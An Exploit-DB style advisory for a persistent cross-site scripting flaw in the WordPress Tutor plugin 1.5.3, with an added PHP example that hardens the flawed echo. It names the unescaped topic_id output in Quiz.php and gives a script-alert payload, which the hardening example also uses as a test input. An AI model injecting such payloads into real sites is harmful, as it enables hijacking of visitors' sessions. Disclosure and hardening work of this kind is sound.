WordPress Plugin tutor.1.5.3 – Persistent Cross-Site Scripting

  • Author: Mehran Feizi
    Date: 2020-02-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48059/
  • #Title: WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
    #Author: mehran feizi
    #Category: webapps
    #Date: 2020-02-12
    #vendor home page: https://wordpress.org/plugins/tutor/
    
    ===================================================================
    Vulnerable page:
    /Quiz.php
    ===================================================================
    Vulnerable Source:
    473: echo $topic_id;
    447: $topic_id = sanitize_text_field($_POST['topic_id']); 
    ===================================================================
    Exploit:
    localhost/wp-content/plugins/tutor/classes/Quiz.php
    $_POST['topic_id'] = <script>alert('mehran')</script>
    =================================================================================
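
A hardened form of the echo listed under "Vulnerable Source", as an added example that is not the plugin's own code or the advisory author's. It assumes topic_id is a numeric post ID written into an HTML attribute, and the function name tutor_example_topic_field is hypothetical. The fallback definitions approximate WordPress's absint() and esc_attr() so the script also runs outside WordPress.

```php
<?php
// Added example; not code from the Tutor plugin or the advisory.
// Fallbacks so the script runs outside WordPress. They approximate the real
// WordPress helpers of the same name and are skipped when WordPress is loaded.
if (!function_exists('absint')) {
    function absint($value) { return abs((int) $value); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

/**
 * Hypothetical helper: build the field that carries topic_id back to the form.
 * Assumption: topic_id is a post ID, so anything that is not a positive
 * integer is rejected rather than reflected.
 */
function tutor_example_topic_field(array $post): string
{
    $raw = $post['topic_id'] ?? '';
    if (!is_scalar($raw)) {
        return '';                      // arrays (topic_id[]=...) are not IDs
    }
    $topic_id = absint($raw);           // validate on input
    if ($topic_id === 0) {
        return '';
    }
    // Escape at the point of output, matched to the HTML attribute context,
    // even though the value is already an integer.
    return sprintf(
        '<input type="hidden" name="topic_id" value="%s">',
        esc_attr((string) $topic_id)
    );
}

// Constructed sample requests: a valid ID, the value from the advisory,
// and an array-valued parameter.
$samples = [
    ['topic_id' => '42'],
    ['topic_id' => "<script>alert('mehran')</script>"],
    ['topic_id' => ['42']],
];
foreach ($samples as $post) {
    var_dump(tutor_example_topic_field($post));
}
```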